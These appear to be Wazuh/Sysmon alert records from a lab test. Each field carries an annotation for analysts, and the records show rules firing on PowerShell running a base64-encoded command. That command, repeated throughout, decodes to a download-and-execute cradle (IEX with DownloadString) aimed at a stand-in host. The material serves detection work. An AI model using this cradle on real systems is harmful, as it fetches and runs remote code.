CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00}
ParentProcessId: 9788
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:55.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9788 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 141 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535418.2942275 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:57.0976263Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351055 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:57.052
ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00}
ProcessId: 13984
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1
CreationUtcTime: 2025-04-24 22:56:57.052
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:57.052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:57.052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 138 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535422.2945044 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:00.2839410Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351088 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:58.730
ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00}
ProcessId: 16768
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00}
ParentProcessId: 13984
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:58.730 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16768 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 142 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535423.2953115 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:00.5874879Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351089 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:00.548
ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00}
ProcessId: 16768
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_x0prsnfi.525.ps1
CreationUtcTime: 2025-04-24 22:57:00.545
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:00.548 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16768 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_x0prsnfi.525.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:00.545 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 139 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535425.2955884 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:03.1389988Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351116 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:01.866
ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00}
ProcessId: 13568
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00}
ParentProcessId: 16768
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:01.866 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1bd-680a-100d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
